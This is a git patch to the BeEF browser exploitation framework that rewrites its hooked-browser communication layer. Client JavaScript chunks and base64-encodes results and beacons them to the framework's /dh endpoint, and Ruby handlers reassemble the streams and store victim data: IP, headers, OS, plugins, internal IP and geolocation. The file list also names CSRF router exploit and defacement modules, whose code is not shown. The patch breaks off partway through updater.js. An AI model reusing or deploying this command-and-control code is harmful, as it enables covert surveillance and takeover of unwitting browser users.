From 15d08b84d63d342761e792fc48f36972fdb23ed5 Mon Sep 17 00:00:00 2001 From: passbe Date: Sat, 12 Mar 2011 01:19:21 +0000 Subject: [PATCH] Merged new data chopper. Migrated to new request() function. Changed all modules to call send() instead of sendback(). git-svn-id: https://beef.googlecode.com/svn/trunk@787 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9 --- lib/loader.rb | 1 + lib/model/command.rb | 3 +- lib/server/commandhandler.rb | 56 ++- lib/server/dynamichandler.rb | 89 +++++ lib/server/httphookserver.rb | 40 +-- lib/server/inithandler.rb | 78 ++-- lib/server/modules/common.rb | 4 +- modules/beefjs/encode/json.js | 91 +++++ modules/beefjs/geolocation.js | 18 +- modules/beefjs/init.js | 2 +- modules/beefjs/net.js | 340 ++++++++---------- modules/beefjs/updater.js | 30 +- .../browser/detect_details/detect_details.js | 12 +- .../detect_visited_urls.js | 2 +- .../browser/link_rewrite/link_rewrite.js | 2 +- .../browser/site_redirect/site_redirect.js | 2 +- .../site_redirect_iframe.js | 6 +- .../insecure_url_skype/insecure_url_skype.js | 2 +- .../commands/host/iphone_tel/iphone_tel.js | 2 +- .../physical_location/physical_location.js | 2 +- .../misc/alert_dialog/alert_dialog.js | 4 +- .../misc/deface_web_page/deface_web_page.js | 4 +- .../misc/prompt_dialog/prompt_dialog.js | 4 +- .../misc/raw_javascript/raw_javascript.js | 4 +- .../misc/replace_video/replace_video.js | 4 +- modules/commands/misc/rickroll/rickroll.js | 4 +- .../detect_local_settings.js | 4 +- .../linksys_befsr41_csrf/befsr41_csrf.js | 2 +- .../linksys_wrt54g2_csrf/wrt54g2_csrf.js | 2 +- .../linksys_wrt54g_csrf/wrt54g_csrf.js | 2 +- .../vtiger_crm_upload_exploit.js | 10 +- .../persistence/iframe_above/iframe_above.js | 2 +- .../popunder_window/popunder_window.js | 2 +- .../recon/collect_links/collect_links.js | 2 +- .../detect_cookies_support/detect_cookies.js | 4 +- .../commands/recon/detect_tor/detect_tor.js | 6 +- .../recon/event_logger/event_logger.js | 2 +- 37 files changed, 471 insertions(+), 373 deletions(-) create mode 100644 lib/server/dynamichandler.rb create mode 100644 modules/beefjs/encode/json.js diff --git a/lib/loader.rb b/lib/loader.rb index 03d4842d5..2159da6ab 100644 --- a/lib/loader.rb +++ b/lib/loader.rb @@ -64,6 +64,7 @@ require 'lib/server/publichandler' require 'lib/server/requesterhandler' require 'lib/server/inithandler' require 'lib/server/eventhandler' +require 'lib/server/dynamichandler' require 'lib/logger' require 'lib/modules/command' diff --git a/lib/model/command.rb b/lib/model/command.rb index 0060ca4fc..caab06093 100644 --- a/lib/model/command.rb +++ b/lib/model/command.rb @@ -39,8 +39,7 @@ class Command raise WEBrick::HTTPStatus::BadRequest, "command is nil" if command.nil? # create the entry for the results - command.results.new(:zombie_id => zombie_id, :data => result, :date => Time.now.to_i) - + command.results.new(:zombie_id => zombie_id, :data => result.to_json, :date => Time.now.to_i) command.save # log that the result was returned diff --git a/lib/server/commandhandler.rb b/lib/server/commandhandler.rb index 54061acf3..c242239d0 100644 --- a/lib/server/commandhandler.rb +++ b/lib/server/commandhandler.rb @@ -1,63 +1,57 @@ module BeEF - class CommandHandler < WEBrick::HTTPServlet::AbstractServlet + class CommandHandler include BeEF::Server::Modules::Common attr_reader :guard + @data = {} - def initialize(config, kclass) + def initialize(data, kclass) @guard = Mutex.new @kclass = BeEF::Modules::Commands.const_get(kclass.capitalize) + @data = data + setup() end - def do_POST(request, response) - @body = '' - @request = request - @response = response - @http_params = @request.query # used to populate datastore - @http_header = @request.header # used to populate datastore + def setup() + @http_params = @data['request'].query # used to populate datastore + @http_header = @data['request'].header # used to populate datastore @http_header['referer'] ||= '' # used to populate datastore - + # get and check command id from the request - command_id = @request.get_command_id() - raise WEBrick::HTTPStatus::BadRequest, "command_id is invalid" if not BeEF::Filter.is_valid_command_id?(command_id) + command_id = get_param(@data, 'cid') + # ruby filter needs to be updated to detect fixnums not strings + command_id = command_id.to_s() + raise WEBrick::HTTPStatus::BadRequest, "command_id is invalid" if not BeEF::Filter.is_valid_command_id?(command_id.to_s()) # get and check session id from the request - hook_session_id = request.get_hook_session_id() - raise WEBrick::HTTPStatus::BadRequest, "hook_session_id is invalid" if not BeEF::Filter.is_valid_hook_session_id?(hook_session_id) + beefhook = get_param(@data, 'beefhook') + raise WEBrick::HTTPStatus::BadRequest, "beefhook is invalid" if not BeEF::Filter.is_valid_hook_session_id?(beefhook) @guard.synchronize { # create the command module to handle the response command = @kclass.new # create the commamd module command.build_callback_datastore(@http_params, @http_header) # build datastore from the response - command.session_id = hook_session_id + command.session_id = beefhook command.callback # call the command module's callback function - it will parse and save the results # get/set details for datastore and log entry command_friendly_name = command.friendlyname raise WEBrick::HTTPStatus::BadRequest, "command friendly name empty" if command_friendly_name.empty? - command_results = command.get_results() + command_results = get_param(@data, 'results') raise WEBrick::HTTPStatus::BadRequest, "command results empty" if command_results.empty? - # save the command module results to the datastore and create a log entry - BeEF::Models::Command.save_result(hook_session_id, command_id, command_friendly_name, command_results) + command_results = {'type' => command_results.class, 'data' => command_results} + BeEF::Models::Command.save_result(beefhook, command_id, command_friendly_name, command_results) } - - response.set_no_cache - response.header['Content-Type'] = 'text/javascript' - response.header['Access-Control-Allow-Origin'] = '*' - response.header['Access-Control-Allow-Methods'] = 'POST' - response.body = @body end - alias do_GET do_POST - - private - - @request - @response - + def get_param(query, key) + return (query.class == Hash and query.has_key?(key)) ? query[key] : nil + end + end + -end \ No newline at end of file +end diff --git a/lib/server/dynamichandler.rb b/lib/server/dynamichandler.rb new file mode 100644 index 000000000..97f3232f7 --- /dev/null +++ b/lib/server/dynamichandler.rb @@ -0,0 +1,89 @@ +module BeEF + + #DynamicHanlder is used reconstruct segmented traffic from the zombies + + class DynamicHandler < WEBrick::HTTPServlet::AbstractServlet + + attr_reader :guard + + #holds packet queue + PQ = Array.new() + + #obtain dynamic mount points from HttpHookServer + MOUNTS = BeEF::HttpHookServer.instance.mounts + + #Combines packet information and pushes to PQ, then checks packets + def do_POST(request, response) + @request = request + response.body = '' + PQ << { + :beefhook => get_param(@request.query, 'bh'), + :stream_id => Integer(get_param(@request.query, 'sid')), + :packet_id => Integer(get_param(@request.query, 'pid')), + :packet_count => Integer(get_param(@request.query, 'pc')), + :data => get_param(@request.query, 'd') + } + check_packets() + end + + alias do_GET do_POST + + #check packets goes through the PQ array and attempts to reconstruct the stream from multiple packets + def check_packets() + checked = Array.new() + PQ.each do |packet| + if (checked.include?(packet[:beefhook]+':'+String(packet[:stream_id]))) + next + end + checked << packet[:beefhook]+':'+String(packet[:stream_id]) + pc = 0 + PQ.each do |p| + if (packet[:beefhook] == p[:beefhook] and packet[:stream_id] == p[:stream_id]) + pc += 1 + end + end + if (packet[:packet_count] == pc) + #better way than sorting the entire array? + PQ.sort_by { |s| s[:packet_id] } + data = '' + PQ.each_with_index do |sp,i| + if (packet[:beefhook] == sp[:beefhook] and packet[:stream_id] == sp[:stream_id]) + data += sp[:data] + end + end + data = JSON.parse(Base64.decode64(data)).first + data['beefhook'] = packet[:beefhook] + data['request'] = @request + data['beefsession'] = @request.get_hook_session_id() + expunge(packet[:beefhook], packet[:stream_id]) + execute(data) + end + end + end + + #delete packets that have been reconstructed + def expunge(beefhook, stream_id) + PQ.delete_if { |p| p[:beefhook] == beefhook and p[:stream_id] == stream_id } + end + + #execute is called once a stream has been rebuilt. it searches the mounts and passes the data to the correct handler + def execute(data) + handler = get_param(data, 'handler') + if (MOUNTS.has_key?(handler)) + if (MOUNTS[handler].class == Array and MOUNTS[handler].length == 2) + MOUNTS[handler][0].new(data, MOUNTS[handler][1]) + else + MOUNTS[handler].new(data) + end + end + end + + #assist function for getting parameter from hash + def get_param(query, key) + return nil if query[key].nil? + query[key] + end + + end + +end diff --git a/lib/server/httphookserver.rb b/lib/server/httphookserver.rb index 9cb30ba41..4212a05ee 100644 --- a/lib/server/httphookserver.rb +++ b/lib/server/httphookserver.rb @@ -10,7 +10,7 @@ module BeEF VERSION = BeEF::Configuration.instance.get('beef_version') - attr_reader :root_dir, :url, :configuration, :command_urls + attr_reader :root_dir, :url, :configuration, :command_urls, :mounts def initialize @configuration = BeEF::Configuration.instance @@ -18,6 +18,7 @@ module BeEF @url = "http://#{beef_host}:#{@configuration.get("http_port")}" @root_dir = File.expand_path('../../../', __FILE__) @command_urls = {} + @mounts = {} end # @@ -70,33 +71,28 @@ module BeEF @http_server.mount "/ui/#{mod_name}", BeEF::HttpHandler, mod_name } + # registers the hook page + @http_server.mount "#{@configuration.get("hook_file")}", BeEF::ZombieHandler + @http_server.mount '/ui/public', BeEF::PublicHandler, "#{root_dir}/public" + @http_server.mount '/favicon.ico', WEBrick::HTTPServlet::FileHandler, "#{root_dir}#{@configuration.get("favicon_dir")}/#{@configuration.get("favicon_file_name")}" + @http_server.mount '/demos/', WEBrick::HTTPServlet::FileHandler, "#{root_dir}/demos/" + + #dynamic handler + @http_server.mount '/dh', BeEF::DynamicHandler + + #register mounts handled by dynamic handler + mounts['/init'] = BeEF::InitHandler + mounts['/event'] = BeEF::EventHandler + mounts['/requester'] = BeEF::RequesterHandler + # registers the command module pages Dir["#{root_dir}/modules/commands/**/*.rb"].each { |command| command_class = (File.basename command, '.rb').capitalize command_file = (File.basename command, '.rb')+'.js' - @http_server.mount "/command/#{command_file}", BeEF::CommandHandler, command_class + mounts["/command/#{command_file}"] = BeEF::CommandHandler, command_class } - - # registers the hook page - @http_server.mount "#{@configuration.get("hook_file")}", BeEF::ZombieHandler - - # registers the requester page - @http_server.mount '/requester', BeEF::RequesterHandler - - # registers the event handler - @http_server.mount '/event', BeEF::EventHandler - - # registers the init page - @http_server.mount '/init', BeEF::InitHandler - - # registers the event handler - @http_server.mount '/event', BeEF::EventHandler - - @http_server.mount '/ui/public', BeEF::PublicHandler, "#{root_dir}/public" - @http_server.mount '/favicon.ico', WEBrick::HTTPServlet::FileHandler, "#{root_dir}#{@configuration.get("favicon_dir")}/#{@configuration.get("favicon_file_name")}" - @http_server.mount '/demos/', WEBrick::HTTPServlet::FileHandler, "#{root_dir}/demos/" - + trap("INT") { BeEF::HttpHookServer.instance.stop } @http_server.start diff --git a/lib/server/inithandler.rb b/lib/server/inithandler.rb index 8cbc91231..2803fefc2 100644 --- a/lib/server/inithandler.rb +++ b/lib/server/inithandler.rb @@ -3,39 +3,31 @@ module BeEF # # The http handler that manages the return of the initial browser details. # - class InitHandler < WEBrick::HTTPServlet::AbstractServlet + class InitHandler attr_reader :guard - + @data = {} + HB = BeEF::Models::Zombie BD = BeEF::Models::BrowserDetails - # - # Class constructor - # - def initialize(config) - # we set up a mutex + def initialize(data) @guard = Mutex.new + @data = data + setup() end - - # - # This function receives any POST http requests. We only - # allow the hooked browser to send back results using POST. - # - def do_POST(request, response) - response.body = '' - + def setup() # validate hook session value - session_id = request.query['BEEFHOOK'] || nil + session_id = get_param(@data, 'beefhook') raise WEBrick::HTTPStatus::BadRequest, "session id is invalid" if not Filter.is_valid_hook_session_id?(session_id) hooked_browser = HB.first(:session => session_id) return if not hooked_browser.nil? # browser is already registered with framework # create the structure repesenting the hooked browser - zombie = BeEF::Models::Zombie.new(:ip => request.peeraddr[3], :session => session_id) + zombie = BeEF::Models::Zombie.new(:ip => @data['request'].peeraddr[3], :session => session_id) zombie.firstseen = Time.new.to_i - zombie.httpheaders = request.header.to_json + zombie.httpheaders = @data['request'].header.to_json @guard.synchronize { zombie.save # the save needs to be conducted before any hooked browser specific logging } @@ -44,72 +36,60 @@ module BeEF log_zombie_domain = zombie.domain log_zombie_domain = "(blank)" if log_zombie_domain.nil? or log_zombie_domain.empty? BeEF::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}", "#{zombie.id}") - # get and store browser name - browser_name = get_param(request.query, 'BrowserName') + browser_name = get_param(@data['results'], 'BrowserName') raise WEBrick::HTTPStatus::BadRequest, "Invalid browser name" if not Filter.is_valid_browsername?(browser_name) BD.set(session_id, 'BrowserName', browser_name) - + # get and store browser version - browser_version = get_param(request.query, 'BrowserVersion') + browser_version = get_param(@data['results'], 'BrowserVersion') raise WEBrick::HTTPStatus::BadRequest, "Invalid browser version" if not Filter.is_valid_browserversion?(browser_version) BD.set(session_id, 'BrowserVersion', browser_version) # get and store browser string - browser_string = get_param(request.query, 'BrowserReportedName') + browser_string = get_param(@data['results'], 'BrowserReportedName') raise WEBrick::HTTPStatus::BadRequest, "Invalid browser browser string" if not Filter.is_valid_browserstring?(browser_string) BD.set(session_id, 'BrowserReportedName', browser_string) - + # get and store the os name - os_name = get_param(request.query, 'OsName') + os_name = get_param(@data['results'], 'OsName') raise WEBrick::HTTPStatus::BadRequest, "Invalid browser os name" if not Filter.is_valid_osname?(os_name) BD.set(session_id, 'OsName', os_name) - + # get and store page title - page_title = get_param(request.query, 'PageTitle') + page_title = get_param(@data['results'], 'PageTitle') raise WEBrick::HTTPStatus::BadRequest, "Invalid page title name" if not Filter.is_valid_pagetitle?(page_title) BD.set(session_id, 'PageTitle', page_title) - + # get and store page title - host_name = get_param(request.query, 'HostName') + host_name = get_param(@data['results'], 'HostName') raise WEBrick::HTTPStatus::BadRequest, "Invalid host name" if not Filter.is_valid_hostname?(host_name) BD.set(session_id, 'HostName', host_name) - + # get and store the browser plugins - browser_plugins = get_param(request.query, 'BrowserPlugins') + browser_plugins = get_param(@data['results'], 'BrowserPlugins') raise WEBrick::HTTPStatus::BadRequest, "Invalid browser plugins" if not Filter.is_valid_browser_plugins?(browser_plugins) BD.set(session_id, 'BrowserPlugins', browser_plugins) - + # get and store the internal ip address - internal_ip = get_param(request.query, 'InternalIP') + internal_ip = get_param(@data['results'], 'InternalIP') if not internal_ip.nil? raise WEBrick::HTTPStatus::BadRequest, "Invalid internal IP address" if not Filter.is_valid_ip?(internal_ip) BD.set(session_id, 'InternalIP', internal_ip) end - + # get and store the internal hostname - internal_hostname = get_param(request.query, 'InternalHostname') + internal_hostname = get_param(@data['results'], 'InternalHostname') if not internal_hostname.nil? raise WEBrick::HTTPStatus::BadRequest, "Invalid internal host name" if not Filter.is_valid_hostname?(host_name) BD.set(session_id, 'InternalHostname', internal_hostname) end - end - - alias do_GET do_POST - - # returns a selected parameter from the query string. + def get_param(query, key) - return nil if query[key].nil? - b64_param = query[key] - raise WEBrick::HTTPStatus::BadRequest, "Invalid init base64 value" if Filter.has_non_printable_char?(b64_param) - escaped_param = CGI.unescapeHTML(b64_param) - raise WEBrick::HTTPStatus::BadRequest, "Invalid init escaped value" if Filter.has_non_printable_char?(escaped_param) - param = Base64.decode64(escaped_param) - raise WEBrick::HTTPStatus::BadRequest, "Invalid init value" if Filter.has_valid_browser_details_chars?(param) - param + return (query.class == Hash and query.has_key?(key)) ? query[key] : nil end end -end \ No newline at end of file +end diff --git a/lib/server/modules/common.rb b/lib/server/modules/common.rb index 47aa385d2..c12e45e68 100644 --- a/lib/server/modules/common.rb +++ b/lib/server/modules/common.rb @@ -18,7 +18,7 @@ module Modules # set up values required to construct beefjs beefjs = '' # init the beefjs string (to be sent as the beefjs file) beefjs_path = "#{$root_dir}/modules/beefjs/" # location of sub files - js_sub_files = %w(lib/jquery-1.5.min.js lib/evercookie.js beef.js browser.js browser/cookie.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js net/local.js init.js) + js_sub_files = %w(lib/jquery-1.5.min.js lib/evercookie.js beef.js browser.js browser/cookie.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js) # construct the beefjs string from file(s) js_sub_files.each {|js_sub_file_name| @@ -139,4 +139,4 @@ module Modules end end -end \ No newline at end of file +end diff --git a/modules/beefjs/encode/json.js b/modules/beefjs/encode/json.js new file mode 100644 index 000000000..2b7c9ba3c --- /dev/null +++ b/modules/beefjs/encode/json.js @@ -0,0 +1,91 @@ +// Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/ + +beef.encode.json = { + + stringify: function(o) { + if (typeof(JSON) == 'object' && JSON.stringify) + return JSON.stringify(o); + + var type = typeof(o); + + if (o === null) + return "null"; + + if (type == "undefined") + return undefined; + + if (type == "number" || type == "boolean") + return o + ""; + + if (type == "string") + return $.quoteString(o); + + if (type == 'object') + { + if (typeof o.toJSON == "function") + return $.toJSON( o.toJSON() ); + + if (o.constructor === Date) + { + var month = o.getUTCMonth() + 1; + if (month < 10) month = '0' + month; + + var day = o.getUTCDate(); + if (day < 10) day = '0' + day; + + var year = o.getUTCFullYear(); + + var hours = o.getUTCHours(); + if (hours < 10) hours = '0' + hours; + + var minutes = o.getUTCMinutes(); + if (minutes < 10) minutes = '0' + minutes; + + var seconds = o.getUTCSeconds(); + if (seconds < 10) seconds = '0' + seconds; + + var milli = o.getUTCMilliseconds(); + if (milli < 100) milli = '0' + milli; + if (milli < 10) milli = '0' + milli; + + return '"' + year + '-' + month + '-' + day + 'T' + + hours + ':' + minutes + ':' + seconds + + '.' + milli + 'Z"'; + } + + if (o.constructor === Array) + { + var ret = []; + for (var i = 0; i < o.length; i++) + ret.push( $.toJSON(o[i]) || "null" ); + + return "[" + ret.join(",") + "]"; + } + + var pairs = []; + for (var k in o) { + var name; + var type = typeof k; + + if (type == "number") + name = '"' + k + '"'; + else if (type == "string") + name = $.quoteString(k); + else + continue; //skip non-string or number keys + + if (typeof o[k] == "function") + continue; //skip pairs where the value is a function. + + var val = $.toJSON(o[k]); + + pairs.push(name + ":" + val); + } + + return "{" + pairs.join(", ") + "}"; + } + + } +} + +beef.regCmp('beef.encode.json'); diff --git a/modules/beefjs/geolocation.js b/modules/beefjs/geolocation.js index 2d83cb65a..2eb348d6f 100644 --- a/modules/beefjs/geolocation.js +++ b/modules/beefjs/geolocation.js @@ -27,7 +27,7 @@ beef.geolocation = { $j.ajax({ error: function(xhr, status, error){ //console.log("[geolocation.js] openstreetmap error"); - beef.net.sendback(command_url, command_id, "latitude=" + latitude + beef.net.send(command_url, command_id, "latitude=" + latitude + "&longitude=" + longitude + "&osm=UNAVAILABLE" + "&geoLocEnabled=True"); @@ -36,7 +36,7 @@ beef.geolocation = { //console.log("[geolocation.js] openstreetmap success"); var jsonResp = $j.parseJSON(data); - beef.net.sendback(command_url, command_id, "latitude=" + latitude + beef.net.send(command_url, command_id, "latitude=" + latitude + "&longitude=" + longitude // + "&osm=" + encodeURI(jsonResp.display_name) + "&osm=tofix" @@ -55,7 +55,7 @@ beef.geolocation = { getGeolocation: function (command_url, command_id){ if (!navigator.geolocation) { - beef.net.sendback(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False"); + beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False"); return; } //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition"); @@ -71,19 +71,19 @@ beef.geolocation = { switch(error.code) // Returns 0-3 { case 0: - beef.net.sendback(command_url, command_id, "latitude=UNKNOWN_ERROR&longitude=UNKNOWN_ERROR&geoLocEnabled=False"); + beef.net.send(command_url, command_id, "latitude=UNKNOWN_ERROR&longitude=UNKNOWN_ERROR&geoLocEnabled=False"); return; case 1: - beef.net.sendback(command_url, command_id, "latitude=PERMISSION_DENIED&longitude=PERMISSION_DENIED&geoLocEnabled=False"); + beef.net.send(command_url, command_id, "latitude=PERMISSION_DENIED&longitude=PERMISSION_DENIED&geoLocEnabled=False"); return; case 2: - beef.net.sendback(command_url, command_id, "latitude=POSITION_UNAVAILABLE&longitude=POSITION_UNAVAILABLE&geoLocEnabled=False"); + beef.net.send(command_url, command_id, "latitude=POSITION_UNAVAILABLE&longitude=POSITION_UNAVAILABLE&geoLocEnabled=False"); return; case 3: - beef.net.sendback(command_url, command_id, "latitude=TIMEOUT&longitude=TIMEOUT&geoLocEnabled=False"); + beef.net.send(command_url, command_id, "latitude=TIMEOUT&longitude=TIMEOUT&geoLocEnabled=False"); return; } - beef.net.sendback(command_url, command_id, "latitude=UNKNOWN_ERROR&longitude=UNKNOWN_ERROR&geoLocEnabled=False"); + beef.net.send(command_url, command_id, "latitude=UNKNOWN_ERROR&longitude=UNKNOWN_ERROR&geoLocEnabled=False"); }, {enableHighAccuracy:true, maximumAge:30000, timeout:27000} ); @@ -91,4 +91,4 @@ beef.geolocation = { } -beef.regCmp('beef.geolocation'); \ No newline at end of file +beef.regCmp('beef.geolocation'); diff --git a/modules/beefjs/init.js b/modules/beefjs/init.js index e09ae7a15..2606e0771 100644 --- a/modules/beefjs/init.js +++ b/modules/beefjs/init.js @@ -16,7 +16,7 @@ window.onload = function() { function beef_init() { if (!beef.pageIsLoaded) { beef.pageIsLoaded = true; - beef.net.sendback_browser_details() + beef.net.browser_details() beef.updater.execute_commands(); beef.updater.check(); } diff --git a/modules/beefjs/net.js b/modules/beefjs/net.js index 7ec44bac4..c09507e4e 100644 --- a/modules/beefjs/net.js +++ b/modules/beefjs/net.js @@ -5,99 +5,118 @@ */ beef.net = { - beef_url: "<%= @beef_url %>", - beef_hook: "<%= @beef_hook %>", - beef_queue: [], + host: "<%= @beef_host %>", + port: "<%= @beef_port %>", + hook: "<%= @beef_hook %>", + handler: '/dh', + chop: 2000, + pad: 30, //this is the amount of padding for extra params such as pc, pid and sid + sid_count: 0, + cmd_queue: [], - /** - * Response Object - returned from beef.net.request with result of request - */ - response: function() { - this.status_code = null; // 500, 404, 200, 302 - this.response_body = null; // "…." if not a cross domain request - this.port_status = null; // tcp port is open, closed or not http - this.was_cross_domain = null; // true or false - this.was_timedout = null; // the user specified timeout was reached - this.duration = null; // how long it took for the request to complete - }, + //Command object + command: function() { + this.cid = null; + this.results = null; + this.handler = null; + this.callback = null; + this.results = null; + }, - /** - * Gets an object that can be used for ajax requests. - * - * @example: var http = beef.net.get_ajax(); - */ - get_ajax: function() { - - // try objects - try {return new XMLHttpRequest()} catch(e) {}; - try {return new ActiveXObject('Msxml2.XMLHTTP')} catch(e) {}; - try {return new ActiveXObject('Microsoft.XMLHTTP')} catch(e) {}; - - // unsupported browser - console.error('You browser is not supported') - console.error('please provide details to dev team') - return false; + //Packet object + packet: function() { + this.id = null; + this.data = null; + }, + + //Stream object + stream: function() { + this.id = null; + this.packets = []; + this.pc = 0; + this.get_base_url_length = function() { + return (this.url+this.handler+'?'+'bh='+beef.session.get_hook_session_id()).length; + }, + this.get_packet_data = function() { + var p = this.packets.shift(); + return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data } + }; }, - - /** - * Build param string from hash. - */ - construct_params_from_hash: function(param_array) { - - param_str = ""; - - for (var param_name in param_array) { - param_str = this.construct_params(param_str, param_name, param_array[param_name]) - } - - return param_str; + /** + * Response Object - returned from beef.net.request with result of request + */ + response: function() { + this.status_code = null; // 500, 404, 200, 302 + this.body = null; // "…." if not a cross domain request + this.port_status = null; // tcp port is open, closed or not http + this.was_cross_domain = null; // true or false + this.was_timedout = null; // the user specified timeout was reached + this.duration = null; // how long it took for the request to complete + }, + + //Queues the command, to be sent back to the framework on the next refresh + queue: function(handler, cid, results, callback) { + if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) + { + var s = new beef.net.command(); + s.cid = cid; + s.results = beef.net.clean(results); + s.callback = callback; + s.handler = handler; + this.cmd_queue.push(s); + } }, - - /** - * Build param string. - */ - construct_params: function(param_str, key, value) { - - // if param_str is not a str make it so - if (typeof(param_str) != 'string') param_str = ''; - - if (param_str != "" ) { param_str += "&"; } // if not the first param add an '&' - param_str += key; - param_str += "="; - param_str += beef.encode.base64.encode(value); - - return param_str; - }, - - /** - * Performs http requests. - * @param: {String} the url to send the request to. - * @param: {String} the method to use: GET or POST - **NOTE** This param now ignored - * @param: {Function} the handler to callback once the http request has been performed. - * @param: {String} the parameters to send for a POST request. - * - * @example: beef.net.raw_request("http://beef.com/", 'POST', handlerfunction, "param1=value1¶m2=value2"); - */ - raw_request: function(url, method, handler, params) { - $j.getScript( url + '?' + params, handler); - }, - - /** - * Performs http requests with browoser id. - * @param: {String} the url to send the request to. - * @param: {String} the method to use: GET or POST - **NOTE** This param now ignored - * @param: {Function} the handler to callback once the http request has been performed. - * @param: {String} the parameters to send for a POST request. - * - * @example: beef.net.request("http://beef.com/", 'POST', handlerfunction, "param1=value1¶m2=value2"); - */ - request: function(url, method, handler, params) { - params += '&BEEFHOOK=' + BEEFHOOK; // append browser id - this.raw_request(url, method, handler, params); - }, - - /** + + //Queues the current command and flushes the queue straight away + send: function(handler, cid, results, callback) { + this.queue(handler, cid, results, callback); + this.flush(); + }, + + //Flush all currently queued commands to the framework + flush: function() { + if (this.cmd_queue.length > 0) + { + var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue)); + this.cmd_queue.length = 0; + this.sid_count++; + var stream = new this.stream(); + stream.id = this.sid_count; + var pad = stream.get_base_url_length() + this.pad; + //cant continue if chop amount is too low + if ((this.chop - pad) > 0) + { + var data = this.chunk(data, (this.chop - pad)); + for (var i = 1; i <= data.length; i++) + { + var packet = new this.packet(); + packet.id = i; + packet.data = data[(i-1)]; + stream.packets.push(packet); + } + stream.pc = stream.packets.length; + this.push(stream); + } + } + }, + + //Split string into chunk lengths determined by amount + chunk: function(str, amount) { + if (typeof amount == 'undefined') n=2; + return str.match(RegExp('.{1,'+amount+'}','g')); + }, + + //Push packets to framework + push: function(stream) { + //need to implement wait feature here eventually + for (var i = 0; i < stream.pc; i++) + { + this.request('http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null); + } + }, + + /** *Performs http requests * @param: {String} scheme: HTTP or HTTPS * @param: {String} method: GET or POST @@ -112,27 +131,27 @@ beef.net = { * * @return: {Object} response: this object contains the response details */ - request_new: function(scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) { - + request: function(scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) { //check if same domain or cross domain - if (document.domain == domain){ - cross_domain = false - }else{ - cross_domain = true - } - + cross_domain = (document.domain == domain) ? false : true; + + //build the url + var url = scheme+"://"+domain; + url = (port != null) ? url+":"+port : url; + url = (path != null) ? url+path : url; + url = (anchor != null) ? url+"#"+anchor : url; + //define response object var response = new this.response; response.was_cross_domain = cross_domain; var start_time = new Date().getTime(); - //build and execute request $j.ajax({type: method, dataType: dataType, - url: scheme+"://"+domain+":"+port+path+"#"+anchor, + url: url, data: data, - timeout: (timeoutbeef_js_cmps=beef.browser,beef.browser.cookie,beef.session,beef.net.os,beef.dom,beef.logger,beef.net,beef.updater,beef.encode.base64,beef.net.local * 1000), + timeout: (timeout * 1000), //function on success success: function(data, textStatus, jqXHR){ var end_time = new Date().getTime(); @@ -153,96 +172,43 @@ beef.net = { //function on completion complete: function(transport) { response.status_code = transport.status; - } - }); + }).done(function() { if (callback != null) { callback(response); } }); return response; }, - - /** - * Send browser details back to the framework. This function will gather the details - * and send them back to the framework - * - * @example: beef.net.sendback_browser_details(); - */ - sendback_browser_details: function() { - // get hash of browser details - var details = beef.browser.getDetails(); - - // get the hook session id - details['HookSessionID'] = beef.session.get_hook_session_id(); - - // contruct param string - var params = this.construct_params_from_hash(details); - - // return data to the framework - this.sendback("/init", 0, params); - }, - - /** - * Queues a communication request to be sent the next time the hook updates - * @param: {String} The url to return the results to. - * @param: {Integer} The command id that launched the command module. - * @param: {String/Object} The results to send back. - * @param: {Function} the handler to callback once the http request has been performed. - * - * @example: beef.net.queue("/commandmodule/prompt_dialog.js", 19, "answer=zombie_answer"); - */ - queue: function(commandmodule, command_id, results, handler) { - this.beef_queue.push({'command':commandmodule, 'cid':command_id, 'results':results, 'handler':handler}); - }, - - /** - * Sends results back to the BeEF framework. - * @param: {String} The url to return the results to. - * @param: {Integer} The command id that launched the command module. - * @param: {String/Object} The results to send back. - * @param: {Function} the handler to callback once the http request has been performed. - * - * @example: beef.net.sendback("/commandmodule/prompt_dialog.js", 19, "answer=zombie_answer"); - */ - sendback: function(commandmodule, command_id, results, handler) { - beef.net.queue(commandmodule, command_id, results, handler); - beef.net.flush_queue(); - }, - - /** - * Sends results back to the BeEF framework. - */ - flush_queue: function() { - for (var i in this.beef_queue) - { - var results = this.beef_queue[i]['results']; - if(typeof results == 'object') { - s_results = ''; - for(key in results) { - s_results += key + '=' + escape(results[key].toString()) + '&'; - } - results = s_results; - } - - if(typeof results == 'string' && typeof this.beef_queue[i]['cid'] == 'number') { - results += '&command_id='+this.beef_queue[i]['cid']; - this.request(this.beef_url + this.beef_queue[i]['command'], 'POST', this.beef_queue[i]['handler'], results); - } - this.beef_queue[i]['expunge'] = true; - } - beef.net.expunge_queue(); - }, - - /** - * Cleans queue of commands that have been executed - */ - expunge_queue: function() { - for (var i = 0; i < this.beef_queue.length; i++) - { - if (this.beef_queue[i] && this.beef_queue[i]['expunge']) - { - this.beef_queue.splice(i,1); - } - } - } - + + //this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {} + //http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/ + clean: function(r) { + if (this.array_has_string_key(r)) { + var obj = {}; + for (var key in r) + obj[key] = (this.array_has_string_key(obj[key])) ? this.clean(r[key]) : r[key]; + return obj; + } + return r; + }, + + //Detects if an array has a string key + array_has_string_key: function(arr) { + if ($j.isArray(arr)) + { + try { + for (var key in arr) + if (isNaN(parseInt(key))) return true; + } catch (e) { } + } + return false; + }, + + //Sends back browser details to framework + browser_details: function() { + var details = beef.browser.getDetails(); + details['HookSessionID'] = beef.session.get_hook_session_id(); + this.send('/init', 0, details); + } + }; -beef.regCmp('beef.net'); \ No newline at end of file + +beef.regCmp('beef.net'); diff --git a/modules/beefjs/updater.js b/modules/beefjs/updater.js index 